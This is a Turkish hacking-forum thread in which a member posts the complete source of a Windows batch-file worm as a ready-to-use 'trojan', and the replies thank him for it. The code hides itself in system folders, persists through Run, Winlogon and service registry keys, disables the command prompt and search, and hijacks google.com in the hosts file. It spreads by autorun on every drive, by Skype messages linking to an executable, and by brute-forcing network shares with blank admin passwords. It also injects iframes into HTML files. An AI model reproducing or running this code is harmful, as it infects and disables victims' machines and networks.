İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

yeni çIkan sÜper bİ TrojAn (google) _kOd_...

27-07-2010 10:16
#1
kilyos06@ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2009
Nereden:
ArtwiN HacK TeaM
Mesajlar:
550
Teşekkür (Etti):
8
Teşekkür (Aldı):
507
Konular:
290
@echo off & break off
:loop
if not exist "%userprofile%\tmp" mkdir "%userprofile%\tmp"
copy %0 "%userprofile%\tmp\Qsoft.bat"
echo msgbox("Visit
www.google.com.",16,"VISIT IT!") > "%userprofile%\tmp\tmp.vbs"
echo set shell = CreateObject("Wscript.Shell") >> "%userprofile%\tmp\stsyk.vbs"
echo shell.run "Qsoft.bat", 0 >> "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp"
attrib +h +s +r "%userprofile%\tmp\Qsoft.bat"
copy %0 %windir%\system32\taskmgr.bat
attrib +h +s +r %windir%\system32\taskmgr.bat
reg add HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "rundll-drivers" /d "%userprofile%\tmp\tmp.vbs" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v "HideFileExt" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v "NoFind" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v "NoFolderOptions" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v SuperHidden /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
echo "HKLM\SYSTEM\CurrentControlSet\Services\Window s network Service" >%windir%\system32\n32.reg
echo "Type"=dword:00000110 >>%windir%\system32\n32.reg
echo "Start"=dword:00000002 >>%windir%\system32\n32.reg
echo "ErrorControl"=dword:00000000 >>%windir%\system32\n32.reg
echo "ImagePath"="%userprofile%\tmp\Qsoft.bat" >>%windir%\system32\n32.reg
echo "DisplayName"="Windows Network Service" >>%windir%\system32\n32.reg
echo "ObjectName"="LocalSystem" >>%windir%\system32\n32.reg
echo "Description"="Windows Network Service" >>%windir%\system32\n32.reg
echo HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WIN DOWS_REG_SERVICE\
0000\Control >>%windir%\system32\n32.reg
echo "*NewlyCreated*"=dword:00000000 >>%windir%\system32\n32.reg
echo "ActiveService"="Windows Network Service" >>%windir%\system32\n32.reg
REGEDIT /S %windir%\system32\n32.reg


echo [InternetShortcut] > "%userprofile%\Desktop\0110005.url"
echo URL=http://www.google.com >> "%userprofile%\Desktop\0110005.url"
echo IDList= >> "%userprofile%\Desktop\0110005.url"
echo [{000214A0-0000-0000-C000-000000000046}] >> "%userprofile%\Desktop\0110005.url"
echo Prop3=19,2 >> "%userprofile%\Desktop\0110005.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\Desktop\%random%_Visit!!.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\favorites"
if not exist "%programfiles%\Qsoft" mkdir "%programfiles%\Qsoft"
copy "%userprofile%\Desktop\0110005.url" "%programfiles%\Qsoft"
echo 216.146.36.97 google.com >>"%windir%\system32\drivers\etc\hosts"
echo 216.146.36.97
www.google.com >>"%windir%\system32\drivers\etc\hosts"

copy %0 %windir%\system32\drivers\Qsoft.bat
copy "%userprofile%\tmp\stsyk.vbs" %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\Qsoft.bat
CACLS %windir%\system32\drivers\syk.vbs /E /P %username%:R
CACLS %windir%\system32\drivers\Qsoft.bat /E /P %username%:R
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,%windir%\system32\drivers\syk.vb s" /f
if exist "%userprofile%\desktop\desktop.ini" copy "%userprofile%\desktop\desktop.ini" %windir%\system32\drivers
for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y ,z) do (
if exist %%g:\ (
copy %0 %%g:\bin.bat
echo [autorun] >%%g:\autorun.inf
echo open=bin.bat >>%%g:\autorun.inf
echo shellexecute=bin.bat >>%%g:\autorun.inf
echo shell\Explore\command=bin.bat >>%%g:\autorun.inf
echo shell\Open\command=bin.bat >>%%g:\autorun.inf
echo shell=Explore >>%%g:\autorun.inf
attrib +h +s +r %%g:\autorun.inf
attrib +h +s +r %%g:\bin.bat
)
)


echo on error resume next >>%windir%\skype.vbs
echo set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_") >>%windir%\skype.vbs
echo Fruxr.Client.Start() >>%windir%\skype.vbs
echo Fruxr.Attach() >>%windir%\skype.vbs
echo For Each KZN In Fruxr.Friends >>%windir%\skype.vbs
echo Fruxr.SendMessage KZN.handle,"
http://h1.ripway.com/windowsgame/svchost.exe " >>%windir%\skype.vbs
echo next >>%windir%\skype.vbs
start %windir%\skype.vbs
ping localhost -n 15
tskill skype
taskkill /IM /F skype
del %windir%\skype.vbs

for /f "tokens=1 delims= " %%f in ('net view ^| find " " ') do echo %%f >>%windir%\teest.txt
for /f %%g in (%windir%\teest.txt) do (

net use %%g /user:admin ""
net use %%g /user:administrator ""
net use %%g /user:%username% ""
net use %%g /user:%username% ""
net use %%g\IPC$ /user:administrator ""
net use %%g\admin$ /user:administrator ""
net use %%g\print$ /user:administrator ""
net use %%g\c$ /user:administrator ""
net use %%g\IPC$ /user:adm ""
net use %%g\admin$ /user:admin ""
net use %%g\print$ /user:admin ""
net use %%g\c$ /user:admin ""
copy %0 %%g\IPC$\funny.bat
copy %0 %%g\C$\funny.bat
copy %0 %%g\admin$\funny.bat
copy %0 %%g\print$\funny.bat


for /f "tokens=1 delims= " %%a in ('net view %%g ^| find " " ') do echo %%a >>%windir%\input123.blp
for /f %%t in (%windir%\input123.blp) do (
copy %0 %%g\%%t\readme.bat
copy %0 %%g\%%t\%%t.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\Admin$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\IPC$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\%%t\readme.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\C$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\print$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\admin$\funny.bat"
)

)
dir /s /ad /b * >%windir%\tmp.log
for /f "tokens=1-5 delims=." %%I in (%windir%\tmp.log) do (
for %%t in (%%I\*.html) do (
echo ^<iframe src="
http://google.com"^> >>%%t
)
for %%b in (%%I\*.htm) do (
echo ^<iframe src="
http://google.com"^> >>%%b
)
for %%c in (%%I\*.hta) do (
echo ^<iframe src="
http://google.com"^> >>%%c
)
del %windir%\tmp.log
set /a ranz=%random%%%45+1
ping localhost -n %ranz%
start
http://google.com
goto loop
echo :%username%%random% >>%0



+Bence arşive ekleyin bi daha rastlamayabilir...



++BİR TEŞEKKÜRÜ ÇOOK GÖRMEYİN...++
kjngsec0, The.insan Teşekkür etti.

27-07-2010 17:13
#2
ZiqoR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2010
Nereden:
Mersin
Yaş:
22
Mesajlar:
1.177
Teşekkür (Etti):
0
Teşekkür (Aldı):
153
Konular:
43
saoL ustat qüzel paylaşım
27-07-2010 17:51
#3
kilyos06@ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2009
Nereden:
ArtwiN HacK TeaM
Mesajlar:
550
Teşekkür (Etti):
8
Teşekkür (Aldı):
507
Konular:
290
Alıntı:
ziqor´isimli üyeden Alıntı Mesajı göster
saoL ustat qüzel paylaşım
Evet Bu kodları bulmam uzun sürüyor o yüzden pek sık mesaj atamıyorum

Ama bulup attımmıda tam işlevini görüyor hani...

Yorumun için sağool......
28-07-2010 15:21
#4
koxpstop33 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2009
Mesajlar:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ne işe yarıyor bu

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı